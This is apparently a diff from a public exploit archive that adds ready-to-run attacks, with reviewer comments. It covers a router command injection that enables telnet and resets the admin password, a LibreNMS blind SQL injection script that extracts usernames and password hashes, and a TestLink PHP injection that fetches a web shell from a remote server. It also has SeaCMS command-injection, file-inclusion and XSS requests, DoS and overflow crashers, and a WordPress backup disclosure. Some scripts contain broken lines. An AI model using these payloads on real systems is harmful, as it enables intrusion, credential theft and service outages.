+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+
+r= s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Prev password saved in /tmp/lastpwd")
+
+command="busybox telnetd"
+#start telnetd;
+post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+
+r=s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Telnet Enabled")
+
+#set admin password
+post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+r=s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Prevent corrupting nvram - set a new password= admin")
\ No newline at end of file
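Review bot: Each of the three `print("[+] ...")` lines fires on any HTTP 200 from `/goform/setSysAdm`, which shows only that the form handler answered, not that the command placed in `admpass` ran, so `[+] Telnet Enabled` and `[+] Prev password saved in /tmp/lastpwd` state more than the script has checked. The header also does not list the persistent changes the script makes: it starts `busybox telnetd` and ends by setting the admin password, and neither is reverted. I would add a comment before the first POST, e.g. `# Side effects: writes /tmp/lastpwd, starts telnetd, resets the admin password; each print below reports HTTP 200 only.` The shebang after the header comments has no effect there, and `from requests import Session` and `import os` are unused.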
diff --git a/exploits/linux/local/49259.c b/exploits/linux/local/49259.c
new file mode 100644
index 000000000..524a43d2c
--- /dev/null
+++ b/exploits/linux/local/49259.c
@@ -0,0 +1,57 @@
+# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
+# Date: December 14, 2020
+# Exploit Author: Carter Yagemann
+# Vendor Homepage: https://www.gegl.org
+# Software Link: https://www.gegl.org/babl/
+# Version: libbabl 0.1.62 and newer
+# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
+# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c
+
+/*
+ * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
+ * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
+ *
+ * typedef struct
+ * {
+ *   char  *signature;
+ *   size_t size;
+ *   int  (*destructor)(void *ptr);
+ * } BablAllocInfo;
+ *
+ *
+ * signature is used to track whether a chunk was allocated by babl, and if so, whether
+ * it is currently allocated or freed. This is done by either pointing it to the global
+ * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
+ *
+ * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
+ *
+ * void
+ * babl_free (void *ptr,
+ *            ...)
+ * {
+ *   ...
+ *       if (freed == BAI (ptr)->signature)
+ *         fprintf (stderr, "\nbabl:double free detected\n");
+ *
+ *
+ * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
+ * and free(), which has its own data that it stores within freed chunks, most systems will
+ * overwrite babl's signature variable upon freeing, breaking the double free detection.
+ * The simple PoC below demonstrates this:
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#include <babl/babl-memory.h>
+
+int main(int argc, char **argv) {
+    void *buf = babl_malloc(42);
+    babl_free(buf);
+    // BUG: reports an "unknown" pointer warning when the following is clea=
+rly a double free
+    babl_free(buf);
+
+    return 0;
+}
\ No newline at end of file
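Review bot: The comment inside `main` is split across two added lines (`... is clea=` and `rly a double free`), apparently a quoted-printable soft line break that survived extraction, so `rly a double free` is parsed as code and the file does not compile. It should be one line: `// BUG: reports an "unknown" pointer warning when the following is clearly a double free`. The metadata block at the top uses `#` lines, which a C preprocessor reads as directives (`# Exploit Title: ...` is not a valid one). Wrapping those lines in `/* ... */` keeps the file buildable with the `gcc` command given in the `# Compile:` line.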
diff --git a/exploits/linux/remote/44349.md b/exploits/linux/remote/44349.md
deleted file mode 100644
index 5dbfe5a85..000000000
--- a/exploits/linux/remote/44349.md
+++ /dev/null
@@ -1,68 +0,0 @@
-# Title: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution By Manish (error1046)
-Vendor Home Page: http://testlink.org
-
-Disovered At: Indishell Lab
-
-CVE ID: CVE-2018-7466
-
-///////////
-//OverView
-///////////
-
-Testlink (Version Below 1.9.17) is vulnerable to Remote Code Execution.
-Vulnerable code is in file "install/installNewDB.php". Testlink allows user to re-install it and when user visits "/install/" directory and reachs to "Database detail" page i.e "install/installNewDB.php", user can specifiy PHP code in  "TestLink DB login" field.
-After successful installation, PHP code will get save in config file.
-
-
-Exploitation
-
-During installation process, script first try to connect MySQL "root" user account (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further.
-
-Script save MySQL server host, username and password in config file.
-
-Here attacker can take advantage of this process to write PHP code in config file.
-
-To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file).
-
-To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps
- 
- -> comment out skip-networking  as well as bind-address (if any present in my.cnf )i.e change line 
- 
- 			skip-networking 
-    		to 
-			# skip-networking
-    
-		and 
-    
-			bind-address    = some_ip
-			to
-			#bind-address = some_ip
-  
-	save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP
- 
- Now, you need to configure MySQL root user in such way so that when remote script try to connect to MySQL server root user, it allows remote script.
- 
- When attacker provide credentials of a Remote MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username, password and need to specify below mentioned PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname).
-   
- 	"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//"
- 
- Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name
-"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in config_db.inc.php file. After that attacker just need to need to access the config file config_db.inc.php with following GET hethod HTTP parameters
-
-    http://testlink/config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt
-
-It will dump PHP web shell in base directory with name ica.php.
-
-![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20-below%201.9.17-%20Remote%20Code%20Execution/testlink%20POC.png)
-
---==[[ Greetz To ]]==--
-
-	Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
-	Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
-	Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
-	Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
-
---==[[Love to]]==--
-
-	My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
-	Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
\ No newline at end of file
diff --git a/exploits/linux/webapps/49265.txt b/exploits/linux/webapps/49265.txt
new file mode 100644
index 000000000..1a676ee59
--- /dev/null
+++ b/exploits/linux/webapps/49265.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Raysync 3.3.3.8 - RCE
+# Date: 04/10/2020
+# Exploit Author: XiaoLong Zhu
+# Vendor Homepage: www.raysync.io
+# Version: below 3.3.3.8
+# Tested on: Linux
+
+step1: run RaysyncServer.sh to build a web application on the local
+
+environment, set admin password to 123456 , which will be write to
+
+manage.db file.
+
+step2: curl "file=@manage.db" http://[raysync
+ip]/avatar?account=1&UserId=/../../../../config/manager.db
+
+to override remote manage.db file in server.
+
+step3: login in admin portal with admin/123456.
+
+step4: create a normal file with all permissions in scope.
+
+step5: modify RaySyncServer.sh ,add arbitrary evil command.
+
+step6: trigger rce with clicking "reset" button
\ No newline at end of file
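Review bot: The header is ambiguous about the affected release: the title names `Raysync 3.3.3.8` while the `# Version:` line says `below 3.3.3.8`, so a reader cannot tell whether 3.3.3.8 is the vulnerable build or the first fixed one. State it one way in both places, for example `# Version: < 3.3.3.8` with a matching title, if that is what was tested. The steps also call the database file both `manage.db` and `manager.db`; the write-up should use the one name the product actually uses, so administrators know which file to monitor for unexpected changes.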
diff --git a/exploits/multiple/dos/49283.txt b/exploits/multiple/dos/49283.txt
new file mode 100644
index 000000000..4de592ae7
--- /dev/null
+++ b/exploits/multiple/dos/49283.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc)
+# Date: 15/12/2020
+# Exploit Author: Guillaume PETIT
+# Vendor Homepage: https://nxlog.co
+# Software Link: https://nxlog.co/products/nxlog-community-edition/download
+# Version: 2.10.2150
+# Tested on: Linux Debian 10 && Windows Server 2019
+
+#!/usr/bin/python3
+
+import sys
+import time
+import argparse
+from scapy.all import *
+
+def getPayload(args):
+        # IF UNIX
+        if (args.OS == 1):
+                return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden"
+        # IF WINDOWS
+        elif (args.OS == 2):
+                return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden"
+
+        # Test
+        elif (args.OS == 3):
+                return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden"
+
+def runExploit(args,payload):
+        priority = 30
+        message = payload
+        syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message)
+        send(syslog,verbose=args.DEBUG)
+
+def getArguments():
+        parser = argparse.ArgumentParser(description="Go h@ck SYSLOG")
+        parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server")
+        parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514")
+        parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test")
+        parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable")
+        return parser.parse_args()
+
+def main():
+        args = getArguments()
+        payload = getPayload(args)
+        runExploit(args,payload)
+main()
\ No newline at end of file
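Review bot: `getPayload` falls through and returns `None` for any `-os` value other than 1, 2 or 3, so `runExploit` then fails with a `TypeError` on the string concatenation instead of a usage error. In `getArguments`, `-ip` and `-os` are declared `required=True` together with a `default`, which can never take effect. Constrain the option at parse time with `choices=(1, 2, 3)` and drop the dead defaults. The header would also benefit from a comment stating that the three messages differ only in the token in the syslog hostname position (`..`, `CON`, `123soleil`), since that is the field a defender would filter or alert on.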
diff --git a/exploits/multiple/webapps/49246.py b/exploits/multiple/webapps/49246.py
new file mode 100755
index 000000000..82060e3e5
--- /dev/null
+++ b/exploits/multiple/webapps/49246.py
@@ -0,0 +1,263 @@
+# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
+# Google Dork: Unknown
+# Date: 13-12-2020
+# Exploit Author: Hodorsec
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://github.com/librenms/librenms
+# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
+# Version: 1.46
+# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
+# CVE : N/A
+
+#!/usr/bin/python3
+
+# EXAMPLE:
+# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
+# [*] Checking if authentication for page is required...
+# [*] Visiting page to retrieve initial token and cookies...
+# [*] Retrieving authenticated cookie...
+# [*] Printing number of rows in table...
+# 1
+# [*] Found 1 rows of data in table 'users'
+#
+# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# librenms
+# [*] Retrieved value 'librenKs' for column 'username' in row 1
+# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
+# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
+#
+# [+] Done!
+
+import requests
+import urllib3
+import os
+import sys
+import re
+from bs4 import BeautifulSoup
+
+# Optionally, use a proxy
+# proxy = "http://<user>:<pass>@<proxy>:<port>"
+proxy = ""
+os.environ['http_proxy'] = proxy
+os.environ['HTTP_PROXY'] = proxy
+os.environ['https_proxy'] = proxy
+os.environ['HTTPS_PROXY'] = proxy
+
+# Disable cert warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Set timeout
+timeout = 10
+
+# Injection prefix and suffix
+inj_prefix = "(select(sleep("
+inj_suffix = ")))))"
+
+# Decimal begin and end
+dec_begin = 48
+dec_end = 57
+
+# ASCII char begin and end
+ascii_begin = 32
+ascii_end = 126
+
+# Handle CTRL-C
+def keyboard_interrupt():
+    """Handles keyboardinterrupt exceptions"""
+    print("\n\n[*] User requested an interrupt, exiting...")
+    exit(0)
+
+# Custom headers
+def http_headers():
+    headers = {
+        'User-Agent': 'Mozilla',
+    }
+    return headers
+
+def check_auth(url,headers):
+    print("[*] Checking if authentication for page is required...")
+    target = url + "/graph.php"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    if "Unauthorized" in r.text:
+        return True
+    else:
+        return False
+
+def get_initial_token_and_cookies(url,headers):
+    print("[*] Visiting page to retrieve initial token and cookies...")
+    target = url + "/login"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    soup = BeautifulSoup(r.text,'html.parser')
+    for n in soup('input'):
+        if n['name'] == "_token":
+            token = n['value']
+            return token,r.cookies
+        else:
+            return None,r.cookies
+
+def get_valid_cookie(url,headers,token,cookies,usern,passw):
+    print("[*] Retrieving authenticated cookie...")
+    appl_cookie = "laravel_session"
+    post_data = {'_token':token,
+                'username':usern,
+                'password':passw,
+                'submit':''}
+    target = url + "/login"
+    r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.text
+    if "Overview | LibreNMS" in res:
+        return r.cookies
+    else:
+        print("[!] No valid response from used session, exiting!\n")
+        exit(-1)
+
+# Perform the SQLi call for injection
+def sqli(url,headers,cookies,inj_str,sleep):
+    comment_inj_str = re.sub(" ","/**/",inj_str)
+    inj_params = {'id':'1',
+                'stat':'none',
+                'type':'port_mac_acc_total',
+                'sort':comment_inj_str,
+                'debug':'1'}
+    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
+    # Do GET request
+    r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.elapsed.total_seconds()
+    if res >= sleep:
+        return True
+    elif res < sleep:
+        return False
+    else:
+        print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
+        exit(-1)
+
+# Extract rows
+def get_rows(url,headers,cookies,table,sleep):
+    rows = ""
+    max_pos_rows = 4
+    # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
+    for pos in range(1,max_pos_rows+1):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop decimals
+        direction = "="
+        for num_rows in range(dec_begin,dec_end+1):
+            row_char = chr(num_rows)
+            inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                rows += row_char
+                print(row_char,end='',flush=True)
+                break
+    if rows != "":
+        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
+        return int(rows)
+    else:
+        return False
+
+# Loop through positions and characters
+def get_data(url,headers,cookies,row,column,table,sleep):
+    extracted = ""
+    max_pos_len = 50
+    # Loop through length of string
+    # Not very efficient, should use a guessing algorithm
+    print("[*] Extracting strings from row " + str(row+1) + "...")
+    for pos in range(1,max_pos_len):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop through ASCII printable characters
+        direction = "="
+        for guess in range(ascii_begin,ascii_end+1):
+            extracted_char = chr(guess)
+            inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                extracted += chr(guess)
+                print(extracted_char,end='',flush=True)
+                break
+    return extracted
+
+# Main
+def main(argv):
+    if len(sys.argv) == 5:
+        usern = sys.argv[1]
+        passw = sys.argv[2]
+        url = sys.argv[3]
+        sleep = int(sys.argv[4])
+    else:
+        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
+        exit(0)
+
+    # Random headers
+    headers = http_headers()
+
+    # Do stuff
+    try:
+        # Get a valid initial token and cookies
+        token,cookies = get_initial_token_and_cookies(url,headers)
+        
+        # Check if authentication is required
+        auth_required = check_auth(url,headers)
+
+        if auth_required:
+            # Get an authenticated session cookie using credentials
+            valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
+        else:
+            valid_cookies = cookies
+            print("[+] Authentication not required, continue without authentication...")
+
+        # Setting the correct vulnerable page
+        url = url + "/graph.php"
+
+        # The columns to retrieve
+        columns = ['username','password']
+
+        # The table to retrieve data from
+        table = "users"
+
+        # Getting rows
+        print("[*] Printing number of rows in table...")
+        rows = get_rows(url,headers,valid_cookies,table,sleep)
+        if not rows:
+            print("[!] Unable to retrieve rows, checks requests.\n")
+            exit(-1)
+
+        # Getting values for found rows in specified columns
+        for column in columns:
+            print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
+            for row in range(0,rows):
+                # rowval_len = get_length(url,headers,row,column,table)
+                retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
+                print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
+        # Done
+        print("\n[+] Done!\n")
+
+    except requests.exceptions.Timeout:
+        print("[!] Timeout error\n")
+        exit(-1)
+    except requests.exceptions.TooManyRedirects:
+        print("[!] Too many redirects\n")
+        exit(-1)
+    except requests.exceptions.ConnectionError:
+        print("[!] Not able to connect to URL\n")
+        exit(-1)
+    except requests.exceptions.RequestException as e:
+        print("[!] " + str(e))
+        exit(-1)
+    except requests.exceptions.HTTPError as e:
+        print("[!] Failed with error code - " + str(e.code) + "\n")
+        exit(-1)
+    except KeyboardInterrupt:
+        keyboard_interrupt()
+        exit(-1)
+
+# If we were called as a program, go execute the main function.
+if __name__ == "__main__":
+    main(sys.argv[1:])
\ No newline at end of file
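Review bot: Every `requests` call passes `verify=False`, including the POST in `get_valid_cookie` that carries the username and password, and the module-level `urllib3.disable_warnings(...)` removes the only signal that certificate checking is off. Anyone on the path between the tester and the server can therefore read the credentials and the `laravel_session` cookie. Make verification the default with a module constant, `VERIFY_TLS = True`, pass `verify=VERIFY_TLS`, and call `disable_warnings` only when it is switched off. Separately, in `main` the `except requests.exceptions.HTTPError` clause is unreachable because it follows `RequestException`, its base class, and `e.code` is not an attribute of that exception.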
diff --git a/exploits/multiple/webapps/49247.py b/exploits/multiple/webapps/49247.py
new file mode 100755
index 000000000..8819ba6af
--- /dev/null
+++ b/exploits/multiple/webapps/49247.py
@@ -0,0 +1,55 @@
+# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
+# Date: 13.12.2020
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://sourceforge.net/projects/miniweb/
+# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
+# Version: 0.8.19
+# Tested on: Win7 x86
+# Researchers: Security For Everyone Team - https://securityforeveryone.com
+
+'''
+Description
+
+ MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
+ first parameter in a POST request.
+
+Exploitation
+
+ The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
+ if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
+
+About Security For Everyone Team
+
+We are a team that has been working on cyber security in the industry for a long time. 
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
+
+'''
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) != 2 :
+	print "[+] Usage : python exploit.py [VICTIM_IP]"
+	exit(0)
+
+TCP_IP = sys.argv[1]
+TCP_PORT = 8000
+
+xx = "A"*2038 #4085
+
+http_req = "POST /index.html HTTP/1.1\r\n"
+http_req += "Host: 192.168.231.140\r\n"
+http_req += "From: header-data\r\n"
+http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+http_req += xx + "=param_data1&param_name2=param_data2"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TCP_IP, TCP_PORT))
+print "[+] Sending exploit payload..."
+s.send(http_req)
+s.close()
\ No newline at end of file
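Review bot: The script is Python 2 only, because the two `print` statements (before `exit(0)` and before `s.send`) are syntax errors under Python 3, but the header does not say so. The `#!/usr/bin/python` line also sits below the docstring, where it has no effect. Add a header line such as `# Requires: Python 2.7` and move the shebang to line 1 or drop it; `import struct` is unused and can go. The description names the crash condition but gives no fixed release or workaround, so a line like `# Fixed in: <version, not given on the page>` would help anyone still running 0.8.19.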
diff --git a/exploits/multiple/webapps/49249.txt b/exploits/multiple/webapps/49249.txt
new file mode 100644
index 000000000..f7202209a
--- /dev/null
+++ b/exploits/multiple/webapps/49249.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
+
+Vulnerable parameters:ip
+
+payload:";phpinfo();//
\ No newline at end of file
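Review bot: The captured request keeps what appear to be real session values in the `Cookie:` header (`PHPSESSID`, `t00ls`, `t00ls_s`), and the same values are repeated in 49250.txt and 49251.txt. Replace them with placeholders such as `PHPSESSID=<admin-session>` before publishing. The admin path `/5f9js3/admin_ip.php` together with the session cookie suggests the request is sent from a logged-in administrator, which the header never states. A line such as `# Privileges required: admin` belongs in all three files, since it changes how the findings are rated.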
diff --git a/exploits/multiple/webapps/49250.txt b/exploits/multiple/webapps/49250.txt
new file mode 100644
index 000000000..acedb7419
--- /dev/null
+++ b/exploits/multiple/webapps/49250.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+Vulnerable parameters: file
+
+payload:C:/windows/system.ini
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49251.txt b/exploits/multiple/webapps/49251.txt
new file mode 100644
index 000000000..fec335073
--- /dev/null
+++ b/exploits/multiple/webapps/49251.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
+
+Vulnerable parameters: checkuser
+
+payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49252.txt b/exploits/multiple/webapps/49252.txt
new file mode 100644
index 000000000..2bdfffc61
--- /dev/null
+++ b/exploits/multiple/webapps/49252.txt
@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
+# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
+# Date: 2020-12-12
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.boldgrid.com/
+# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
+# Version: 1.14.9
+# Tested on: BackBox Linux
+
+1) 'readme.txt' file reveal the plugin version :
+-> GET /wp-content/plugins/boldgrid-backup/readme.txt
+Stable tag: 1.14.9
+
+2) 'env-info.php' file reveals the following informations without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
+{
+    [...],
+    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
+86_64",
+    "php_version":"7.X.X",
+    "server_addr":"127.0.0.1",
+    "server_name":"www.example.com",
+    "server_protocol":"HTTP/1.1",
+    "server_software":"Apache/2.X.XX (Ubuntu)",
+    "uid":XX,
+    "username":"www-data"
+}
+
+3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
+{
+    [...]
+    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
+    [...]
+}
+--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
\ No newline at end of file
